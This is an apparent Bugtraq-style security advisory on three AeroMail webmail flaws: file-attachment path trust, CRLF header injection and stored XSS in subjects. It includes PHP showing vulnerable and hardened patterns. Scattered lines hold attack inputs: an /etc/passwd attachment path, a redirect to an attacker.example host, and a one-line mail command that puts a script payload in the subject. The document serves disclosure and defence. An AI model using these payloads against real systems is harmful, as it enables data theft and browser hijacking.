
AeroMail multiple vulnerabilities

by Nikola Strahija on March 3rd, 2002

AeroMail is a Web-based email client written in PHP. It uses an IMAP server to read and store messages in one or more user-defined folders. Its features include HTTP authentication for login (no cookies), folder manipulation, support for sending and viewing attachments, inline image display, multilanguage support, and URL highlighting.


PROGRAM: AeroMail
VENDOR: Mark Cushman ([email protected])
HOMEPAGE: http://the.cushman.net/projects/aeromail/
MIRROR: http://www.packetplay.com/projects/aeromail/
VULNERABLE VERSIONS: all versions below 1.45
SEVERITY: medium to high

ISSUES:

1) When sending e-mails, the attachment subsystem can be tricked into attaching
local files from the web server, or remote files fetched from a URL, instead of
the uploaded file it expects.

How is that possible? After PHP has handled a file upload, it sets a few
variables with information about it. One of them holds the name of the
temporary file in which the uploaded data was stored. It is important to check
that this variable was really set by a file upload: with register_globals it
can just as well come from ordinary POSTed form data, in which case the script
opens whatever path or URL the client supplied. PHP's is_uploaded_file()
exists for exactly this check.

2) Additional headers can be added to outgoing e-mail messages by supplying,
in the To, Cc or Subject field, some ordinary data followed by a CRLF and then
another header line. (A lot of other programs allow this too; it is not
specific to AeroMail.) This can be used, for instance, to smuggle uuencoded
attachments into the header section using lines that end in a bare CR instead
of CRLF, as previously discussed here on Bugtraq.

3) JavaScript and HTML code in a message's Subject header is rendered live
when the subject is displayed. This allows denial-of-service attacks (for
example redirecting the browser away from the mailbox), theft of cookies, etc.

Issues 1 and 2 require a valid user/password combination to be exploited,
while issue 3 is open to anyone who can send the victim a message.
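As an added illustration, and not AeroMail's own code nor the exploits the author distributed, here are the three patterns side by side in PHP: the upload-path check that issue 1 needs, the header-value check for issue 2, and the output escaping for issue 3. The field names, function names and sample inputs are assumptions made for this example; the "vulnerable" functions show the general mistake, not AeroMail's actual source.

```php
<?php
// Added example, not code from AeroMail. Field names, function names and
// sample inputs are assumptions for illustration.

// --- Issue 1: trusting the "uploaded file" path -------------------------
// Vulnerable pattern: whatever arrives as the temp-file name is opened.
// With register_globals=On (the PHP 4 default) a plain POST field named
// attachment sets $attachment just like a real upload would, so
// attachment=/etc/passwd or attachment=http://attacker.example/x attaches
// that resource (fopen wrappers fetch URLs when allow_url_fopen is on).
function attachment_body_vulnerable($attachment)
{
    return file_get_contents($attachment);
}

// Hardened: only accept a path that PHP itself created for this request.
function attachment_body_safe(array $file)
{
    if (!isset($file['tmp_name']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // is_uploaded_file() is true only for a file uploaded via HTTP POST in
    // this request; a POSTed string or a local path fails the check.
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    return file_get_contents($file['tmp_name']);
}

// --- Issue 2: CRLF in To/Cc/Subject --------------------------------------
// Vulnerable pattern: user fields are concatenated straight into the header
// block. A subject of "hi\r\nBcc: victim@example.org" adds a Bcc header.
function headers_vulnerable($to, $cc, $subject)
{
    return "To: $to\r\nCc: $cc\r\nSubject: $subject\r\n";
}

// Hardened: a header value may not contain CR or LF (a bare CR included,
// which is what the uuencode trick in issue 2 relies on). Reject rather
// than strip, so the caller can report the bad input instead of silently
// sending something other than what the user typed.
function header_value_safe($name, $value)
{
    if (preg_match('/[\r\n]/', $value)) {
        throw new InvalidArgumentException("$name header contains a line break");
    }
    return "$name: $value\r\n";
}

function headers_safe($to, $cc, $subject)
{
    return header_value_safe('To', $to)
         . header_value_safe('Cc', $cc)
         . header_value_safe('Subject', $subject);
}

// --- Issue 3: Subject rendered as live HTML ------------------------------
// Vulnerable pattern: echo "<td>$subject</td>"; a subject such as
// <script>self.location.href="http://attacker.example/"</script> then runs
// in the reader's browser as soon as the folder listing is displayed.
function subject_cell_safe($subject)
{
    // Escape every HTML metacharacter so the subject is shown, not executed.
    return '<td>' . htmlspecialchars($subject, ENT_QUOTES, 'UTF-8') . '</td>';
}

// Demonstration on constructed input.
$bad_subject = "hi\r\nBcc: victim@example.org";
echo headers_vulnerable('a@example.org', '', $bad_subject);   // extra Bcc line
try {
    echo headers_safe('a@example.org', '', $bad_subject);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
echo subject_cell_safe('<script>alert(1)</script>'), "\n";
```

The attachment check is the one that matters most for issue 1: validating the path string (no "/" prefix, no "://") is not enough, because the only reliable question is "did PHP create this file for this request", and that is what is_uploaded_file() answers.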

The vendor was contacted with an explanation, two exploits and a patch on the
23rd of February. Version 1.45, which is not vulnerable to any of these
issues, was released on the 27th of February.


RECOMMENDATION:

I recommend that all users upgrade to version 1.45 immediately.


EXPLOITS:

Here are HTML exploits for issues 1 and 2. They are distributed as a
uuencoded, gzipped tar archive.

Issue 3 doesn't need a special exploit - you just send an ordinary mail:

mail -s '<script>self.location.href="http://www.kuro5hin.org/"</script>' [email protected]

[uuencoded archive not reproduced intact in this copy]

